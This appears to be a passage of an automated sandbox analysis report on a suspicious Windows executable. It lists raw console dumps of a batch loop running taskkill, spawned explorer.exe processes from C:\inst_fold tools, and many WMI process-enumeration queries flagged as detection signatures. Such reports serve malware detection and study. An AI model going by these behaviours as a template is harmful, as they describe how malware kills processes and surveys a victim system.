Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......X.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......g...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....s...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......y.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......]...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......i........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......o................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......u.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......z...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......`...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......l........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......r................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......x.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......M...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......Y........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d......._................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......e.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......t...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......-...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....9...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......?.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......E...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......!................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......'.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......6...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....B...............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......H.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......N...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......]...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......i........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......o................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......u.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d......."........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......(................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......=...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....I...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......O.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......U...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......#................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......).............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......8...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....D...............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......J.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......P...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......]...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......i........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......o................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......u.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......1...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......=........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......C................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......I.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......X...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....d...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......j.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......p...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......N...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......Z........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......`................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......f.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......u...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...

Launches a second explorer.exe instance

Show sources

Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\explorer.exe
Source: C:\inst_fold\armforce.exe	Process created: C:\Windows\explorer.exe

PE file has an executable .text section and no other executable section

Show sources

Source: CDaNsQ7Rrd.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using Borland Delphi (Probably coded in Delphi)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	Key opened: HKEY_USERS\Software\Borland\Delphi\Locales

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskeng.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\7zaa.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\7zaa.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\7zaa.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armstart.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
